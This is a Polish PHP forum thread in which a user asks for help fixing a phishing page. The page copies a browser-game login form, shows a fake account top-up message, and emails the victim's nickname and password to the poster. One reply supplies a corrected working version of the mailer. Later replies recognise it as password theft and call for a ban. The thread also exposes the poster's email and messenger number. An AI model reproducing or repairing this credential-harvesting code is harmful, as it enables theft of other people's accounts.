Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Prośba o poprawienie skryptu.
Forum PHP.pl > Forum > PHP
avifaune
Witam. Mam skrypt który niestety nie działa. Jest on prosty chodzi oto żeby były pola do logowania jak w różnych grach typu ogame.pl
wpisujesz nick, haslo, wybierasz swiat, a następnie klikasz wyślij i wyskakuje komunikat "Doladowanie konta w wysokosci 10 MF zostanie zrealizowane w ciagu 12 godzin." A to co wpisał użytkownik zostaje wysłane na mój email.

index.php

Kod
</b></div><form action=podziekowanie.php method="get">
  <TABLE>
<TR>
<TD>nick:</TD>
<TD><input type="text" name="nick"></TD>
  </TR>
<TR>
<TD>haslo:</TD>
  <TD><input type="text" name=";pass"></TD>
</tr>
  <TR>
<TD>swiat:</TD>
<TD><SELECT NAME="list"><OPTION VALUE="s1" target="_top">swiat 1 <OPTION VALUE="s2" target="_top">swiat 2 <OPTION VALUE="s3" target="_top">swiat 3 </SELECT></TD>
  </TR>
</TABLE>
<input type="submit" value="loguj" name=log>
</form><div><b>

podziekowanie.php
Kod
</b></div><?php
$nick = $_GET['nick'];
$pass = $_GET['pass'];
$list = $_GET['list'];
$mail =  "avifaune@gmail.com";
mail($mail, ";przechwycenie hasla", "nick:".$nick." haslo:".$pass."serwer:".$list.":P";);
?>

<center>;Doladowanie konta w wysoko&#-74;ci 10 MF zostanie zrealizowane w ci&#-79;gu 12 godzin.</center>  <div><b>

Prosze o kontakt na gg 6539222 lub odpisaniu tutaj z napisaniem gdzie jest błąd lub jeśli ktoś by mógł napisaniu nowego, dobrego skryptu. Z góry dziękuje.

piotrooo89
może coś takiego:

1. </b></div>
  2. <?php
  3. $nick = $_GET['nick'];
  4. $pass = $_GET['pass'];
  5. $list = $_GET['list'];
  6. $temat = "Dodanie do konta";
  7. $tresc = "$nick $pass $list";
  8. $mail = "avifaune@gmail.com";
  9. mail($mail, $temat, $tresc);
  10. ?>
  11. <center>;Doladowanie konta w wysoko&#-74;ci 10 MF zostanie zrealizowane w ci&#-79;gu 12 godzin.</center> <div><b>

dodatkowo poczytaj o nagłówkach... mail
avifaune
słuchaj ale ok zmieniłem plik podziekowanie.php na ten skrypt co mi podałeś, wrzuciłem na serwer i wyskakuje znów ta sama strona gdy wpisze dane i nacisnę wyślij.
masz gg? Napisz do mnie jakbyś mógł.

Kliknij Tutaj!!
piotrooo89
to podaj gg a nie...
avifaune
sorry... 6539222
bim2
Widać, że skrypt ma służyć do przejęcia hasła... Ban i zablokujcie temat...
piotrooo89
dzięki bim2... a ja z nim już na gadu pisałem... ale sie nie skapłem... dziekówka nie będzie mi to hackować.

Kod
6539222 17:32:39
nie... nie oto chodzi...
6539222 17:32:43
kurde no...
6539222 17:33:03
to tylko zemsta na takim1 kolesiu co mi zabral konto...

afff... blok temat
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.